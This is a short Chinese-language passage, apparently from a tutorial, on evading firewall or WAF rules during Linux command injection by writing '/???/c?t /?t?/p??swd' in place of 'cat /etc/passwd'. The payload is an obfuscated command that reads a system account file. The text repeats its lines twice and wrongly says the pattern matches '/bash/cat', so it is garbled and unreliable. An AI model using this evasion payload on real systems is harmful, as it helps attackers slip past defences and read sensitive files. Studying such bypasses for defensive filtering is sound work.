本文中讲述的绕过防火墙技巧,只适用于linux系统命令注入环境中,大家就不要纠结于这些绕过技巧不适用于mysql、window什么的。
使用通配符绕过防火墙规则
例如使用 /???/c?t /?t?/p??swd 来代替 cat /etc/passwd
/???/c?t /?t?/p??swd 其实匹配到的是 /bash/cat /etc/passwd
本文中讲述的绕过防火墙技巧,只适用于linux系统命令注入环境中,大家就不要纠结于这些绕过技巧不适用于mysql、window什么的。
例如使用 /???/c?t /?t?/p??swd 来代替 cat /etc/passwd
/???/c?t /?t?/p??swd 其实匹配到的是 /bash/cat /etc/passwd